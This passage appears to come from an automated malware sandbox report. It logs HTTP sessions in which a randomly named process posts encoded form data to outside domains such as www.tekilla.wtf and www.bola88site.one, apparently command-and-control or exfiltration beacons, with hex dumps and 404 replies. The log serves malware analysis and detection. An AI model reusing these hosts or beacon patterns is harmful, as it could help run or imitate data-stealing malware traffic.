                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 70 2b 34 2f 34 57 71 7a 5a 78 58 65 54 50 6c 75 58 57 6b 71 65 7a 52 6e 2b 31 39 61 4c 57 69 32 67 3d
                                                    Data Ascii: y0qt3F=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWp+4/4WqzZxXeTPluXWkqezRn+19aLWi2g=
                                                    Sep 26, 2024 09:24:30.335239887 CEST195INHTTP/1.1 404 Not Found
                                                    Content-Type: text/plain; charset=utf-8
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 26 Sep 2024 07:24:30 GMT
                                                    Content-Length: 19
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                    Data Ascii: 404 page not found


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449744172.191.244.62801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:32.408077002 CEST10909OUTPOST /fpzw/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Origin: http://www.tekilla.wtf
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.tekilla.wtf/fpzw/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 6d 6b 38 32 55 79 67 6e 44 79 65 41 35 6b 73 50 38 43 76 68 78 64 53 2b 7a 48 74 73 2f 4b 38 2b 61 74 53 47 62 72 67 5a 47 63 78 52 74 45 55 79 4a 76 34 4a 2b 34 50 34 67 33 32 6f 61 52 47 52 57 59 6a 68 34 61 58 6c 61 53 6b 6a 4f 44 65 59 37 70 36 6f 30 73 52 4d 4b 35 33 64 58 69 30 75 6f 62 45 5a 57 43 2b 6d 55 4e 59 72 59 6b 4a 65 50 30 52 59 4c 44 36 30 53 6d 57 69 79 4b 47 51 75 4f 39 51 49 31 41 42 53 2f 2f 4a 64 6e 77 4f 7a 41 74 41 30 71 69 74 4f 6e 72 38 54 41 34 44 67 [TRUNCATED]
                                                    Data Ascii: y0qt3F=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcmk82UygnDyeA5ksP8CvhxdS+zHts/K8+atSGbrgZGcxRtEUyJv4J+4P4g32oaRGRWYjh4aXlaSkjODeY7p6o0sRMK53dXi0uobEZWC+mUNYrYkJeP0RYLD60SmWiyKGQuO9QI1ABS//JdnwOzAtA0qitOnr8TA4DgVC7LBY8+qhSr0XTj5OxMcNbSZtqumPVNiHtWWiKhdFi++VPR+3vndiPrCg7XC3vWizSfiM1kMtB6Xwo/JF4FUxcS0kSGgxzaEVqOZRJQnIu57k9RZW6THvXpoMOyj2V5fgZa8gQ5Ty77R56Ds2sEEOvE3GJoQR3Lk5ExT99N4GLkfZd+sCUwPvL9fv1OTsPTNDuAEZNUzWdwFZyxAPY0qBflB+VYTtzS80HVmcbpVhp1kTz14vTefYycn+6sxmnaQTNczHlzXMDU0JtWemFN3FGt8jk/HAWZNlaz6Y26M2lEVIHdd0wiFC3/4gwgJEWGD2tCW8g1i4XEaLp409IX5esyOj9nslhDlTi6Q6HtrD7J+kEzor7RVsbtnhP+nT7CGS96ByKQ034mbOrp2yT0g6PwfqShlUk5mF0hrgfwoWIfMatfob+OwxCmZ0O40s+BRBENVxD/TtVCm8VMpKJUQbbs00G+STS+GxhbK+A+m+xVUaABPUPytN5/WIPYdPonUMmvlZ7ChIHJwE25Rw/Jm586/b/g6jOSBwbVwGPHMSt3EdV5Gawq7ib/uZmMNqhJx0M2gK9LflCppDmXcLc2ckO8hjA9XZDN7qEzwnzB+6ZVTU/+nvNTqIfcnCAqXLepozGJGyw58eNigU4D5UZEFrFuE9onej9Vg3 [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.449745172.191.244.62801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:34.950689077 CEST541OUTGET /fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:24:35.420710087 CEST195INHTTP/1.1 404 Not Found
                                                    Content-Type: text/plain; charset=utf-8
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 26 Sep 2024 07:24:35 GMT
                                                    Content-Length: 19
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                    Data Ascii: 404 page not found


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449746172.96.191.39801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:40.835298061 CEST816OUTPOST /3qit/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Origin: http://www.bola88site.one
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.bola88site.one/3qit/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 49 4d 6a 66 6b 6f 31 6c 74 4e 35 2b 6b 65 6e 62 68 45 5a 73 78 54 46 46 39 6b 2b 30 2b 43 56 5a 77 3d 3d
                                                    Data Ascii: y0qt3F=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUIMjfko1ltN5+kenbhEZsxTFF9k+0+CVZw==
                                                    Sep 26, 2024 09:24:41.763046980 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:41 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.449747172.96.191.39801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:43.378123045 CEST836OUTPOST /3qit/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Origin: http://www.bola88site.one
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.bola88site.one/3qit/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 33 32 59 36 74 4b 35 39 2f 63 43 7a 34 74 7a 4b 39 38 71 6c 31 6f 69 31 6b 45 72 42 4f 42 34 66 49 3d
                                                    Data Ascii: y0qt3F=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+x32Y6tK59/cCz4tzK98ql1oi1kErBOB4fI=
                                                    Sep 26, 2024 09:24:44.287662029 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:44 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.449748172.96.191.39801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:45.927192926 CEST10918OUTPOST /3qit/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Origin: http://www.bola88site.one
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.bola88site.one/3qit/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 39 39 78 6b 36 4c 50 69 35 44 6c 68 54 43 46 59 46 5a 6e 4f 58 61 4c 51 77 74 77 4c 6f 6b 78 6e 4a 37 6d 47 78 31 79 79 43 58 6d 4b 62 4c 64 57 52 4a 6b 50 74 64 77 7a 62 2f 77 6f 65 78 51 77 61 65 6d 76 79 65 56 73 43 39 37 79 43 30 52 6a 38 35 51 53 6a 78 35 4d 68 4c 50 5a 47 52 73 4f 51 5a 37 64 4b 2b 43 43 53 69 4b 46 79 76 73 76 76 5a 35 58 74 32 62 2f 68 6c 39 4c 61 5a 4c 4a 55 6a 66 44 6f 43 63 57 36 5a 46 6e 39 67 6b 33 69 77 74 48 49 4d 64 59 51 51 6d 4b 45 49 58 35 64 [TRUNCATED]
                                                    Data Ascii: y0qt3F=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjf99xk6LPi5DlhTCFYFZnOXaLQwtwLokxnJ7mGx1yyCXmKbLdWRJkPtdwzb/woexQwaemvyeVsC97yC0Rj85QSjx5MhLPZGRsOQZ7dK+CCSiKFyvsvvZ5Xt2b/hl9LaZLJUjfDoCcW6ZFn9gk3iwtHIMdYQQmKEIX5dwuOkOto+AVvrlupyo/cfS4p+SI5VJK8y0CDN6KOb53jKpnNQJWYfwwdXGdNMLG1vFo/z8ZPk4MlXOGiuXhSvZlFZ1iHzY93ge7JeLM4wfEfVYEjh2FqbE0jmxFQKLwRfj6EmCCTWVoc3HfUy++cuZm16cP0AfCl0O+Ksy24KJb5QlvxGQhePx15SmeqHw59WilHJHq5tjgsFDSXkiReUz4ZHVlitmV99Ecj8nNkS2EaDBkjgBpxKx2svy+7IYN9dfzhzO36FF8Cvk1JIKeTApD9zHUN+l3J3rT8rpGxXPmDtH1neyCFXS3oA6PIM5Wq7PBqDnelE2iG+2Y08MDcRwhsJ1cTHll2IL4bmvPBH2PSkbOoZasnfemBaDFMo9W1v+tAqNhEtZYadDMNFYazQgaJQ5s4nqTy3wNIQQ8bqnm+cUZeQK3IMOvQUjDpeINDASzIQR/sJQ+rvYeyQxpmUFSmHVDBy3LenwprPHo6wZaXNsf+n2zr3aZLf37Xnryu56sEJPG1c4hQfDf65QJqy3YKgkN7G53cRVoMKEgslsenMXc5nTg3JQaQpvvGsfZXsbZWz9Yq8J/f3HMzn07tYI5hQ6E7AgOduLxgjt2JoaWCr+XvWa7NLZXSaTZse//2Vll1THnuC67u5c7Au0/DElUj0it4509gY5N [TRUNCATED]
                                                    Sep 26, 2024 09:24:46.851675987 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:46 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.449749172.96.191.39801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:24:48.468880892 CEST544OUTGET /3qit/?y0qt3F=t3sSYQcRGIG2xp6hThC36NAa5pulFT6rmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYRx0f6/FSPt3YGxqpBfNEWUCZ6CvMlkEJ/uE=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:24:49.378112078 CEST1033INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:49 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
